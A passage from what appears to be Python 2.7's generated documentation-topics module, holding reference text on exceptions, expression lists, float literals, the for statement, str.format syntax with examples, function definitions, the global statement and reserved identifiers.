exception is *raised* at the point where the ' 'error is\n' 'detected; it may be *handled* by the surrounding code block or ' 'by any\n' 'code block that directly or indirectly invoked the code block ' 'where\n' 'the error occurred.\n' '\n' 'The Python interpreter raises an exception when it detects a ' 'run-time\n' 'error (such as division by zero). A Python program can also\n' 'explicitly raise an exception with the "raise" statement. ' 'Exception\n' 'handlers are specified with the "try" ... "except" statement. ' 'The\n' '"finally" clause of such a statement can be used to specify ' 'cleanup\n' 'code which does not handle the exception, but is executed ' 'whether an\n' 'exception occurred or not in the preceding code.\n' '\n' 'Python uses the "termination" model of error handling: an ' 'exception\n' 'handler can find out what happened and continue execution at an ' 'outer\n' 'level, but it cannot repair the cause of the error and retry ' 'the\n' 'failing operation (except by re-entering the offending piece of ' 'code\n' 'from the top).\n' '\n' 'When an exception is not handled at all, the interpreter ' 'terminates\n' 'execution of the program, or returns to its interactive main ' 'loop. In\n' 'either case, it prints a stack backtrace, except when the ' 'exception is\n' '"SystemExit".\n' '\n' 'Exceptions are identified by class instances. The "except" ' 'clause is\n' 'selected depending on the class of the instance: it must ' 'reference the\n' 'class of the instance or a base class thereof. The instance ' 'can be\n' 'received by the handler and can carry additional information ' 'about the\n' 'exceptional condition.\n' '\n' 'Exceptions can also be identified by strings, in which case ' 'the\n' '"except" clause is selected by object identity. An arbitrary ' 'value\n' 'can be raised along with the identifying string which can be ' 'passed to\n' 'the handler.\n' '\n' 'Note: Messages to exceptions are not part of the Python API. ' 'Their\n' ' contents may change from one version of Python to the next ' 'without\n' ' warning and should not be relied on by code which will run ' 'under\n' ' multiple versions of the interpreter.\n' '\n' 'See also the description of the "try" statement in section The ' 'try\n' 'statement and "raise" statement in section The raise ' 'statement.\n' '\n' '-[ Footnotes ]-\n' '\n' '[1] This limitation occurs because the code that is executed ' 'by\n' ' these operations is not available at the time the module ' 'is\n' ' compiled.\n', 'exprlists': '\n' 'Expression lists\n' '****************\n' '\n' ' expression_list ::= expression ( "," expression )* [","]\n' '\n' 'An expression list containing at least one comma yields a ' 'tuple. The\n' 'length of the tuple is the number of expressions in the list. ' 'The\n' 'expressions are evaluated from left to right.\n' '\n' 'The trailing comma is required only to create a single tuple ' '(a.k.a. a\n' '*singleton*); it is optional in all other cases. A single ' 'expression\n' "without a trailing comma doesn't create a tuple, but rather " 'yields the\n' 'value of that expression. (To create an empty tuple, use an ' 'empty pair\n' 'of parentheses: "()".)\n', 'floating': '\n' 'Floating point literals\n' '***********************\n' '\n' 'Floating point literals are described by the following lexical\n' 'definitions:\n' '\n' ' floatnumber ::= pointfloat | exponentfloat\n' ' pointfloat ::= [intpart] fraction | intpart "."\n' ' exponentfloat ::= (intpart | pointfloat) exponent\n' ' intpart ::= digit+\n' ' fraction ::= "." digit+\n' ' exponent ::= ("e" | "E") ["+" | "-"] digit+\n' '\n' 'Note that the integer and exponent parts of floating point ' 'numbers can\n' 'look like octal integers, but are interpreted using radix 10. ' 'For\n' 'example, "077e010" is legal, and denotes the same number as ' '"77e10".\n' 'The allowed range of floating point literals is implementation-\n' 'dependent. Some examples of floating point literals:\n' '\n' ' 3.14 10. .001 1e100 3.14e-10 0e0\n' '\n' 'Note that numeric literals do not include a sign; a phrase like ' '"-1"\n' 'is actually an expression composed of the unary operator "-" and ' 'the\n' 'literal "1".\n', 'for': '\n' 'The "for" statement\n' '*******************\n' '\n' 'The "for" statement is used to iterate over the elements of a ' 'sequence\n' '(such as a string, tuple or list) or other iterable object:\n' '\n' ' for_stmt ::= "for" target_list "in" expression_list ":" suite\n' ' ["else" ":" suite]\n' '\n' 'The expression list is evaluated once; it should yield an iterable\n' 'object. An iterator is created for the result of the\n' '"expression_list". The suite is then executed once for each item\n' 'provided by the iterator, in the order of ascending indices. Each\n' 'item in turn is assigned to the target list using the standard rules\n' 'for assignments, and then the suite is executed. When the items are\n' 'exhausted (which is immediately when the sequence is empty), the ' 'suite\n' 'in the "else" clause, if present, is executed, and the loop\n' 'terminates.\n' '\n' 'A "break" statement executed in the first suite terminates the loop\n' 'without executing the "else" clause\'s suite. A "continue" ' 'statement\n' 'executed in the first suite skips the rest of the suite and ' 'continues\n' 'with the next item, or with the "else" clause if there was no next\n' 'item.\n' '\n' 'The suite may assign to the variable(s) in the target list; this ' 'does\n' 'not affect the next item assigned to it.\n' '\n' 'The target list is not deleted when the loop is finished, but if the\n' 'sequence is empty, it will not have been assigned to at all by the\n' 'loop. Hint: the built-in function "range()" returns a sequence of\n' 'integers suitable to emulate the effect of Pascal\'s "for i := a to ' 'b\n' 'do"; e.g., "range(3)" returns the list "[0, 1, 2]".\n' '\n' 'Note: There is a subtlety when the sequence is being modified by the\n' ' loop (this can only occur for mutable sequences, i.e. lists). An\n' ' internal counter is used to keep track of which item is used next,\n' ' and this is incremented on each iteration. When this counter has\n' ' reached the length of the sequence the loop terminates. This ' 'means\n' ' that if the suite deletes the current (or a previous) item from ' 'the\n' ' sequence, the next item will be skipped (since it gets the index ' 'of\n' ' the current item which has already been treated). Likewise, if ' 'the\n' ' suite inserts an item in the sequence before the current item, the\n' ' current item will be treated again the next time through the loop.\n' ' This can lead to nasty bugs that can be avoided by making a\n' ' temporary copy using a slice of the whole sequence, e.g.,\n' '\n' ' for x in a[:]:\n' ' if x < 0: a.remove(x)\n', 'formatstrings': '\n' 'Format String Syntax\n' '********************\n' '\n' 'The "str.format()" method and the "Formatter" class share ' 'the same\n' 'syntax for format strings (although in the case of ' '"Formatter",\n' 'subclasses can define their own format string syntax).\n' '\n' 'Format strings contain "replacement fields" surrounded by ' 'curly braces\n' '"{}". Anything that is not contained in braces is ' 'considered literal\n' 'text, which is copied unchanged to the output. If you need ' 'to include\n' 'a brace character in the literal text, it can be escaped by ' 'doubling:\n' '"{{" and "}}".\n' '\n' 'The grammar for a replacement field is as follows:\n' '\n' ' replacement_field ::= "{" [field_name] ["!" ' 'conversion] [":" format_spec] "}"\n' ' field_name ::= arg_name ("." attribute_name | ' '"[" element_index "]")*\n' ' arg_name ::= [identifier | integer]\n' ' attribute_name ::= identifier\n' ' element_index ::= integer | index_string\n' ' index_string ::= <any source character except ' '"]"> +\n' ' conversion ::= "r" | "s"\n' ' format_spec ::= <described in the next ' 'section>\n' '\n' 'In less formal terms, the replacement field can start with ' 'a\n' '*field_name* that specifies the object whose value is to be ' 'formatted\n' 'and inserted into the output instead of the replacement ' 'field. The\n' '*field_name* is optionally followed by a *conversion* ' 'field, which is\n' 'preceded by an exclamation point "\'!\'", and a ' '*format_spec*, which is\n' 'preceded by a colon "\':\'". These specify a non-default ' 'format for the\n' 'replacement value.\n' '\n' 'See also the Format Specification Mini-Language section.\n' '\n' 'The *field_name* itself begins with an *arg_name* that is ' 'either a\n' "number or a keyword. If it's a number, it refers to a " 'positional\n' "argument, and if it's a keyword, it refers to a named " 'keyword\n' 'argument. If the numerical arg_names in a format string ' 'are 0, 1, 2,\n' '... in sequence, they can all be omitted (not just some) ' 'and the\n' 'numbers 0, 1, 2, ... will be automatically inserted in that ' 'order.\n' 'Because *arg_name* is not quote-delimited, it is not ' 'possible to\n' 'specify arbitrary dictionary keys (e.g., the strings ' '"\'10\'" or\n' '"\':-]\'") within a format string. The *arg_name* can be ' 'followed by any\n' 'number of index or attribute expressions. An expression of ' 'the form\n' '"\'.name\'" selects the named attribute using "getattr()", ' 'while an\n' 'expression of the form "\'[index]\'" does an index lookup ' 'using\n' '"__getitem__()".\n' '\n' 'Changed in version 2.7: The positional argument specifiers ' 'can be\n' 'omitted, so "\'{} {}\'" is equivalent to "\'{0} {1}\'".\n' '\n' 'Some simple format string examples:\n' '\n' ' "First, thou shalt count to {0}" # References first ' 'positional argument\n' ' "Bring me a {}" # Implicitly ' 'references the first positional argument\n' ' "From {} to {}" # Same as "From {0} to ' '{1}"\n' ' "My quest is {name}" # References keyword ' "argument 'name'\n" ' "Weight in tons {0.weight}" # \'weight\' attribute ' 'of first positional arg\n' ' "Units destroyed: {players[0]}" # First element of ' "keyword argument 'players'.\n" '\n' 'The *conversion* field causes a type coercion before ' 'formatting.\n' 'Normally, the job of formatting a value is done by the ' '"__format__()"\n' 'method of the value itself. However, in some cases it is ' 'desirable to\n' 'force a type to be formatted as a string, overriding its ' 'own\n' 'definition of formatting. By converting the value to a ' 'string before\n' 'calling "__format__()", the normal formatting logic is ' 'bypassed.\n' '\n' 'Two conversion flags are currently supported: "\'!s\'" ' 'which calls\n' '"str()" on the value, and "\'!r\'" which calls "repr()".\n' '\n' 'Some examples:\n' '\n' ' "Harold\'s a clever {0!s}" # Calls str() on the ' 'argument first\n' ' "Bring out the holy {name!r}" # Calls repr() on the ' 'argument first\n' '\n' 'The *format_spec* field contains a specification of how the ' 'value\n' 'should be presented, including such details as field width, ' 'alignment,\n' 'padding, decimal precision and so on. Each value type can ' 'define its\n' 'own "formatting mini-language" or interpretation of the ' '*format_spec*.\n' '\n' 'Most built-in types support a common formatting ' 'mini-language, which\n' 'is described in the next section.\n' '\n' 'A *format_spec* field can also include nested replacement ' 'fields\n' 'within it. These nested replacement fields may contain a ' 'field name,\n' 'conversion flag and format specification, but deeper ' 'nesting is not\n' 'allowed. The replacement fields within the format_spec ' 'are\n' 'substituted before the *format_spec* string is interpreted. ' 'This\n' 'allows the formatting of a value to be dynamically ' 'specified.\n' '\n' 'See the Format examples section for some examples.\n' '\n' '\n' 'Format Specification Mini-Language\n' '==================================\n' '\n' '"Format specifications" are used within replacement fields ' 'contained\n' 'within a format string to define how individual values are ' 'presented\n' '(see Format String Syntax). They can also be passed ' 'directly to the\n' 'built-in "format()" function. Each formattable type may ' 'define how\n' 'the format specification is to be interpreted.\n' '\n' 'Most built-in types implement the following options for ' 'format\n' 'specifications, although some of the formatting options are ' 'only\n' 'supported by the numeric types.\n' '\n' 'A general convention is that an empty format string ("""") ' 'produces\n' 'the same result as if you had called "str()" on the value. ' 'A non-empty\n' 'format string typically modifies the result.\n' '\n' 'The general form of a *standard format specifier* is:\n' '\n' ' format_spec ::= ' '[[fill]align][sign][#][0][width][,][.precision][type]\n' ' fill ::= <any character>\n' ' align ::= "<" | ">" | "=" | "^"\n' ' sign ::= "+" | "-" | " "\n' ' width ::= integer\n' ' precision ::= integer\n' ' type ::= "b" | "c" | "d" | "e" | "E" | "f" | "F" ' '| "g" | "G" | "n" | "o" | "s" | "x" | "X" | "%"\n' '\n' 'If a valid *align* value is specified, it can be preceded ' 'by a *fill*\n' 'character that can be any character and defaults to a space ' 'if\n' 'omitted. It is not possible to use a literal curly brace ' '(""{"" or\n' '""}"") as the *fill* character when using the ' '"str.format()" method.\n' 'However, it is possible to insert a curly brace with a ' 'nested\n' "replacement field. This limitation doesn't affect the " '"format()"\n' 'function.\n' '\n' 'The meaning of the various alignment options is as ' 'follows:\n' '\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | Option | ' 'Meaning ' '|\n' ' ' '+===========+============================================================+\n' ' | "\'<\'" | Forces the field to be left-aligned ' 'within the available |\n' ' | | space (this is the default for most ' 'objects). |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'>\'" | Forces the field to be right-aligned ' 'within the available |\n' ' | | space (this is the default for ' 'numbers). |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'=\'" | Forces the padding to be placed after ' 'the sign (if any) |\n' ' | | but before the digits. This is used for ' 'printing fields |\n' " | | in the form '+000000120'. This alignment " 'option is only |\n' ' | | valid for numeric types. It becomes the ' "default when '0' |\n" ' | | immediately precedes the field ' 'width. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'^\'" | Forces the field to be centered within ' 'the available |\n' ' | | ' 'space. ' '|\n' ' ' '+-----------+------------------------------------------------------------+\n' '\n' 'Note that unless a minimum field width is defined, the ' 'field width\n' 'will always be the same size as the data to fill it, so ' 'that the\n' 'alignment option has no meaning in this case.\n' '\n' 'The *sign* option is only valid for number types, and can ' 'be one of\n' 'the following:\n' '\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | Option | ' 'Meaning ' '|\n' ' ' '+===========+============================================================+\n' ' | "\'+\'" | indicates that a sign should be used for ' 'both positive as |\n' ' | | well as negative ' 'numbers. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'-\'" | indicates that a sign should be used ' 'only for negative |\n' ' | | numbers (this is the default ' 'behavior). |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | space | indicates that a leading space should be ' 'used on positive |\n' ' | | numbers, and a minus sign on negative ' 'numbers. |\n' ' ' '+-----------+------------------------------------------------------------+\n' '\n' 'The "\'#\'" option is only valid for integers, and only for ' 'binary,\n' 'octal, or hexadecimal output. If present, it specifies ' 'that the\n' 'output will be prefixed by "\'0b\'", "\'0o\'", or "\'0x\'", ' 'respectively.\n' '\n' 'The "\',\'" option signals the use of a comma for a ' 'thousands separator.\n' 'For a locale aware separator, use the "\'n\'" integer ' 'presentation type\n' 'instead.\n' '\n' 'Changed in version 2.7: Added the "\',\'" option (see also ' '**PEP 378**).\n' '\n' '*width* is a decimal integer defining the minimum field ' 'width. If not\n' 'specified, then the field width will be determined by the ' 'content.\n' '\n' 'When no explicit alignment is given, preceding the *width* ' 'field by a\n' 'zero ("\'0\'") character enables sign-aware zero-padding ' 'for numeric\n' 'types. This is equivalent to a *fill* character of "\'0\'" ' 'with an\n' '*alignment* type of "\'=\'".\n' '\n' 'The *precision* is a decimal number indicating how many ' 'digits should\n' 'be displayed after the decimal point for a floating point ' 'value\n' 'formatted with "\'f\'" and "\'F\'", or before and after the ' 'decimal point\n' 'for a floating point value formatted with "\'g\'" or ' '"\'G\'". For non-\n' 'number types the field indicates the maximum field size - ' 'in other\n' 'words, how many characters will be used from the field ' 'content. The\n' '*precision* is not allowed for integer values.\n' '\n' 'Finally, the *type* determines how the data should be ' 'presented.\n' '\n' 'The available string presentation types are:\n' '\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | Type | ' 'Meaning ' '|\n' ' ' '+===========+============================================================+\n' ' | "\'s\'" | String format. This is the default type ' 'for strings and |\n' ' | | may be ' 'omitted. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | None | The same as ' '"\'s\'". |\n' ' ' '+-----------+------------------------------------------------------------+\n' '\n' 'The available integer presentation types are:\n' '\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | Type | ' 'Meaning ' '|\n' ' ' '+===========+============================================================+\n' ' | "\'b\'" | Binary format. Outputs the number in ' 'base 2. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'c\'" | Character. Converts the integer to the ' 'corresponding |\n' ' | | unicode character before ' 'printing. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'d\'" | Decimal Integer. Outputs the number in ' 'base 10. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'o\'" | Octal format. Outputs the number in base ' '8. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'x\'" | Hex format. Outputs the number in base ' '16, using lower- |\n' ' | | case letters for the digits above ' '9. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'X\'" | Hex format. Outputs the number in base ' '16, using upper- |\n' ' | | case letters for the digits above ' '9. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'n\'" | Number. This is the same as "\'d\'", ' 'except that it uses the |\n' ' | | current locale setting to insert the ' 'appropriate number |\n' ' | | separator ' 'characters. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | None | The same as ' '"\'d\'". |\n' ' ' '+-----------+------------------------------------------------------------+\n' '\n' 'In addition to the above presentation types, integers can ' 'be formatted\n' 'with the floating point presentation types listed below ' '(except "\'n\'"\n' 'and None). When doing so, "float()" is used to convert the ' 'integer to\n' 'a floating point number before formatting.\n' '\n' 'The available presentation types for floating point and ' 'decimal values\n' 'are:\n' '\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | Type | ' 'Meaning ' '|\n' ' ' '+===========+============================================================+\n' ' | "\'e\'" | Exponent notation. Prints the number in ' 'scientific |\n' " | | notation using the letter 'e' to indicate " 'the exponent. |\n' ' | | The default precision is ' '"6". |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'E\'" | Exponent notation. Same as "\'e\'" ' 'except it uses an upper |\n' " | | case 'E' as the separator " 'character. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'f\'" | Fixed point. Displays the number as a ' 'fixed-point number. |\n' ' | | The default precision is ' '"6". |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'F\'" | Fixed point. Same as ' '"\'f\'". |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'g\'" | General format. For a given precision ' '"p >= 1", this |\n' ' | | rounds the number to "p" significant ' 'digits and then |\n' ' | | formats the result in either fixed-point ' 'format or in |\n' ' | | scientific notation, depending on its ' 'magnitude. The |\n' ' | | precise rules are as follows: suppose that ' 'the result |\n' ' | | formatted with presentation type "\'e\'" ' 'and precision "p-1" |\n' ' | | would have exponent "exp". Then if "-4 <= ' 'exp < p", the |\n' ' | | number is formatted with presentation type ' '"\'f\'" and |\n' ' | | precision "p-1-exp". Otherwise, the ' 'number is formatted |\n' ' | | with presentation type "\'e\'" and ' 'precision "p-1". In both |\n' ' | | cases insignificant trailing zeros are ' 'removed from the |\n' ' | | significand, and the decimal point is also ' 'removed if |\n' ' | | there are no remaining digits following ' 'it. Positive and |\n' ' | | negative infinity, positive and negative ' 'zero, and nans, |\n' ' | | are formatted as "inf", "-inf", "0", "-0" ' 'and "nan" |\n' ' | | respectively, regardless of the ' 'precision. A precision of |\n' ' | | "0" is treated as equivalent to a ' 'precision of "1". The |\n' ' | | default precision is ' '"6". |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'G\'" | General format. Same as "\'g\'" except ' 'switches to "\'E\'" if |\n' ' | | the number gets too large. The ' 'representations of infinity |\n' ' | | and NaN are uppercased, ' 'too. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'n\'" | Number. This is the same as "\'g\'", ' 'except that it uses the |\n' ' | | current locale setting to insert the ' 'appropriate number |\n' ' | | separator ' 'characters. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'%\'" | Percentage. Multiplies the number by 100 ' 'and displays in |\n' ' | | fixed ("\'f\'") format, followed by a ' 'percent sign. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | None | The same as ' '"\'g\'". |\n' ' ' '+-----------+------------------------------------------------------------+\n' '\n' '\n' 'Format examples\n' '===============\n' '\n' 'This section contains examples of the "str.format()" syntax ' 'and\n' 'comparison with the old "%"-formatting.\n' '\n' 'In most of the cases the syntax is similar to the old ' '"%"-formatting,\n' 'with the addition of the "{}" and with ":" used instead of ' '"%". For\n' 'example, "\'%03.2f\'" can be translated to "\'{:03.2f}\'".\n' '\n' 'The new format syntax also supports new and different ' 'options, shown\n' 'in the follow examples.\n' '\n' 'Accessing arguments by position:\n' '\n' " >>> '{0}, {1}, {2}'.format('a', 'b', 'c')\n" " 'a, b, c'\n" " >>> '{}, {}, {}'.format('a', 'b', 'c') # 2.7+ only\n" " 'a, b, c'\n" " >>> '{2}, {1}, {0}'.format('a', 'b', 'c')\n" " 'c, b, a'\n" " >>> '{2}, {1}, {0}'.format(*'abc') # unpacking " 'argument sequence\n' " 'c, b, a'\n" " >>> '{0}{1}{0}'.format('abra', 'cad') # arguments' " 'indices can be repeated\n' " 'abracadabra'\n" '\n' 'Accessing arguments by name:\n' '\n' " >>> 'Coordinates: {latitude}, " "{longitude}'.format(latitude='37.24N', " "longitude='-115.81W')\n" " 'Coordinates: 37.24N, -115.81W'\n" " >>> coord = {'latitude': '37.24N', 'longitude': " "'-115.81W'}\n" " >>> 'Coordinates: {latitude}, " "{longitude}'.format(**coord)\n" " 'Coordinates: 37.24N, -115.81W'\n" '\n' "Accessing arguments' attributes:\n" '\n' ' >>> c = 3-5j\n' " >>> ('The complex number {0} is formed from the real " "part {0.real} '\n" " ... 'and the imaginary part {0.imag}.').format(c)\n" " 'The complex number (3-5j) is formed from the real part " "3.0 and the imaginary part -5.0.'\n" ' >>> class Point(object):\n' ' ... def __init__(self, x, y):\n' ' ... self.x, self.y = x, y\n' ' ... def __str__(self):\n' " ... return 'Point({self.x}, " "{self.y})'.format(self=self)\n" ' ...\n' ' >>> str(Point(4, 2))\n' " 'Point(4, 2)'\n" '\n' "Accessing arguments' items:\n" '\n' ' >>> coord = (3, 5)\n' " >>> 'X: {0[0]}; Y: {0[1]}'.format(coord)\n" " 'X: 3; Y: 5'\n" '\n' 'Replacing "%s" and "%r":\n' '\n' ' >>> "repr() shows quotes: {!r}; str() doesn\'t: ' '{!s}".format(\'test1\', \'test2\')\n' ' "repr() shows quotes: \'test1\'; str() doesn\'t: test2"\n' '\n' 'Aligning the text and specifying a width:\n' '\n' " >>> '{:<30}'.format('left aligned')\n" " 'left aligned '\n" " >>> '{:>30}'.format('right aligned')\n" " ' right aligned'\n" " >>> '{:^30}'.format('centered')\n" " ' centered '\n" " >>> '{:*^30}'.format('centered') # use '*' as a fill " 'char\n' " '***********centered***********'\n" '\n' 'Replacing "%+f", "%-f", and "% f" and specifying a sign:\n' '\n' " >>> '{:+f}; {:+f}'.format(3.14, -3.14) # show it " 'always\n' " '+3.140000; -3.140000'\n" " >>> '{: f}; {: f}'.format(3.14, -3.14) # show a space " 'for positive numbers\n' " ' 3.140000; -3.140000'\n" " >>> '{:-f}; {:-f}'.format(3.14, -3.14) # show only the " "minus -- same as '{:f}; {:f}'\n" " '3.140000; -3.140000'\n" '\n' 'Replacing "%x" and "%o" and converting the value to ' 'different bases:\n' '\n' ' >>> # format also supports binary numbers\n' ' >>> "int: {0:d}; hex: {0:x}; oct: {0:o}; bin: ' '{0:b}".format(42)\n' " 'int: 42; hex: 2a; oct: 52; bin: 101010'\n" ' >>> # with 0x, 0o, or 0b as prefix:\n' ' >>> "int: {0:d}; hex: {0:#x}; oct: {0:#o}; bin: ' '{0:#b}".format(42)\n' " 'int: 42; hex: 0x2a; oct: 0o52; bin: 0b101010'\n" '\n' 'Using the comma as a thousands separator:\n' '\n' " >>> '{:,}'.format(1234567890)\n" " '1,234,567,890'\n" '\n' 'Expressing a percentage:\n' '\n' ' >>> points = 19.5\n' ' >>> total = 22\n' " >>> 'Correct answers: {:.2%}'.format(points/total)\n" " 'Correct answers: 88.64%'\n" '\n' 'Using type-specific formatting:\n' '\n' ' >>> import datetime\n' ' >>> d = datetime.datetime(2010, 7, 4, 12, 15, 58)\n' " >>> '{:%Y-%m-%d %H:%M:%S}'.format(d)\n" " '2010-07-04 12:15:58'\n" '\n' 'Nesting arguments and more complex examples:\n' '\n' " >>> for align, text in zip('<^>', ['left', 'center', " "'right']):\n" " ... '{0:{fill}{align}16}'.format(text, fill=align, " 'align=align)\n' ' ...\n' " 'left<<<<<<<<<<<<'\n" " '^^^^^center^^^^^'\n" " '>>>>>>>>>>>right'\n" ' >>>\n' ' >>> octets = [192, 168, 0, 1]\n' " >>> '{:02X}{:02X}{:02X}{:02X}'.format(*octets)\n" " 'C0A80001'\n" ' >>> int(_, 16)\n' ' 3232235521\n' ' >>>\n' ' >>> width = 5\n' ' >>> for num in range(5,12):\n' " ... for base in 'dXob':\n" " ... print '{0:{width}{base}}'.format(num, " 'base=base, width=width),\n' ' ... print\n' ' ...\n' ' 5 5 5 101\n' ' 6 6 6 110\n' ' 7 7 7 111\n' ' 8 8 10 1000\n' ' 9 9 11 1001\n' ' 10 A 12 1010\n' ' 11 B 13 1011\n', 'function': '\n' 'Function definitions\n' '********************\n' '\n' 'A function definition defines a user-defined function object ' '(see\n' 'section The standard type hierarchy):\n' '\n' ' decorated ::= decorators (classdef | funcdef)\n' ' decorators ::= decorator+\n' ' decorator ::= "@" dotted_name ["(" [argument_list [","]] ' '")"] NEWLINE\n' ' funcdef ::= "def" funcname "(" [parameter_list] ")" ' '":" suite\n' ' dotted_name ::= identifier ("." identifier)*\n' ' parameter_list ::= (defparameter ",")*\n' ' ( "*" identifier ["," "**" identifier]\n' ' | "**" identifier\n' ' | defparameter [","] )\n' ' defparameter ::= parameter ["=" expression]\n' ' sublist ::= parameter ("," parameter)* [","]\n' ' parameter ::= identifier | "(" sublist ")"\n' ' funcname ::= identifier\n' '\n' 'A function definition is an executable statement. Its execution ' 'binds\n' 'the function name in the current local namespace to a function ' 'object\n' '(a wrapper around the executable code for the function). This\n' 'function object contains a reference to the current global ' 'namespace\n' 'as the global namespace to be used when the function is called.\n' '\n' 'The function definition does not execute the function body; this ' 'gets\n' 'executed only when the function is called. [3]\n' '\n' 'A function definition may be wrapped by one or more *decorator*\n' 'expressions. Decorator expressions are evaluated when the ' 'function is\n' 'defined, in the scope that contains the function definition. ' 'The\n' 'result must be a callable, which is invoked with the function ' 'object\n' 'as the only argument. The returned value is bound to the ' 'function name\n' 'instead of the function object. Multiple decorators are applied ' 'in\n' 'nested fashion. For example, the following code:\n' '\n' ' @f1(arg)\n' ' @f2\n' ' def func(): pass\n' '\n' 'is equivalent to:\n' '\n' ' def func(): pass\n' ' func = f1(arg)(f2(func))\n' '\n' 'When one or more top-level *parameters* have the form ' '*parameter* "="\n' '*expression*, the function is said to have "default parameter ' 'values."\n' 'For a parameter with a default value, the corresponding ' '*argument* may\n' "be omitted from a call, in which case the parameter's default " 'value is\n' 'substituted. If a parameter has a default value, all following\n' 'parameters must also have a default value --- this is a ' 'syntactic\n' 'restriction that is not expressed by the grammar.\n' '\n' '**Default parameter values are evaluated when the function ' 'definition\n' 'is executed.** This means that the expression is evaluated ' 'once, when\n' 'the function is defined, and that the same "pre-computed" value ' 'is\n' 'used for each call. This is especially important to understand ' 'when a\n' 'default parameter is a mutable object, such as a list or a ' 'dictionary:\n' 'if the function modifies the object (e.g. by appending an item ' 'to a\n' 'list), the default value is in effect modified. This is ' 'generally not\n' 'what was intended. A way around this is to use "None" as the\n' 'default, and explicitly test for it in the body of the function, ' 'e.g.:\n' '\n' ' def whats_on_the_telly(penguin=None):\n' ' if penguin is None:\n' ' penguin = []\n' ' penguin.append("property of the zoo")\n' ' return penguin\n' '\n' 'Function call semantics are described in more detail in section ' 'Calls.\n' 'A function call always assigns values to all parameters ' 'mentioned in\n' 'the parameter list, either from position arguments, from ' 'keyword\n' 'arguments, or from default values. If the form ""*identifier"" ' 'is\n' 'present, it is initialized to a tuple receiving any excess ' 'positional\n' 'parameters, defaulting to the empty tuple. If the form\n' '""**identifier"" is present, it is initialized to a new ' 'dictionary\n' 'receiving any excess keyword arguments, defaulting to a new ' 'empty\n' 'dictionary.\n' '\n' 'It is also possible to create anonymous functions (functions not ' 'bound\n' 'to a name), for immediate use in expressions. This uses lambda\n' 'expressions, described in section Lambdas. Note that the ' 'lambda\n' 'expression is merely a shorthand for a simplified function ' 'definition;\n' 'a function defined in a ""def"" statement can be passed around ' 'or\n' 'assigned to another name just like a function defined by a ' 'lambda\n' 'expression. The ""def"" form is actually more powerful since ' 'it\n' 'allows the execution of multiple statements.\n' '\n' "**Programmer's note:** Functions are first-class objects. A " '""def""\n' 'form executed inside a function definition defines a local ' 'function\n' 'that can be returned or passed around. Free variables used in ' 'the\n' 'nested function can access the local variables of the function\n' 'containing the def. See section Naming and binding for ' 'details.\n', 'global': '\n' 'The "global" statement\n' '**********************\n' '\n' ' global_stmt ::= "global" identifier ("," identifier)*\n' '\n' 'The "global" statement is a declaration which holds for the ' 'entire\n' 'current code block. It means that the listed identifiers are to ' 'be\n' 'interpreted as globals. It would be impossible to assign to a ' 'global\n' 'variable without "global", although free variables may refer to\n' 'globals without being declared global.\n' '\n' 'Names listed in a "global" statement must not be used in the same ' 'code\n' 'block textually preceding that "global" statement.\n' '\n' 'Names listed in a "global" statement must not be defined as ' 'formal\n' 'parameters or in a "for" loop control target, "class" definition,\n' 'function definition, or "import" statement.\n' '\n' '**CPython implementation detail:** The current implementation does ' 'not\n' 'enforce the latter two restrictions, but programs should not ' 'abuse\n' 'this freedom, as future implementations may enforce them or ' 'silently\n' 'change the meaning of the program.\n' '\n' '**Programmer\'s note:** the "global" is a directive to the ' 'parser. It\n' 'applies only to code parsed at the same time as the "global"\n' 'statement. In particular, a "global" statement contained in an ' '"exec"\n' 'statement does not affect the code block *containing* the "exec"\n' 'statement, and code contained in an "exec" statement is unaffected ' 'by\n' '"global" statements in the code containing the "exec" statement. ' 'The\n' 'same applies to the "eval()", "execfile()" and "compile()" ' 'functions.\n', 'id-classes': '\n' 'Reserved classes of identifiers\n' '*******************************\n' '\n' 'Certain classes of identifiers (besides keywords) have ' 'special\n' 'meanings. These classes are identified by the patterns of ' 'leading and\n' 'trailing underscore characters:\n' '\n' '"_*"\n' ' Not imported by "from module import *". The special ' 'identifier "_"\n' ' is used in the interactive interpreter to store the result ' 'of the\n' ' last evaluation; it is stored in the "__builtin__" module. ' 'When\n' ' not in interactive mode, "_" has no special meaning and is ' 'not\n' ' defined. See section The import statement.\n' '\n' ' Note: The name "_" is often used in conjunction with\n' ' internationalization; refer to the documentation for the\n' ' "gettext" module for more information on this ' 'convention.\n' '\n' '"__*__"\n' ' System-defined names. These names are defined by the ' 'interpreter\n' ' and its implementation (including the standard library). ' 'Current\n' ' system names are discussed in the Special method names ' 'section and\n' ' elsewhere. More will likely be defined in future versions ' 'of\n' ' Python. *Any* use of "__*__" names, in any context, that ' 'does not\n' ' follow explicitly documented use, is subject to breakage ' 'without\n' ' warning.\n' '\n' '"__*"\n' ' Class-private names. Names in this category, when used ' 'within the\n' ' context of a class definition, are re-written to use a ' 'mangled form\n' ' to help avoid name clashes between "private" attributes of ' 'base and\n' ' derived classes. See section Identifiers (Names).\n', 'identifiers': '\n' 'Identifiers and keywords\n' '************************\n' '\n' 'Identifiers (also referred to as *names*) are described by ' 'the\n' 'following lexical definitions:\n' '\n' ' 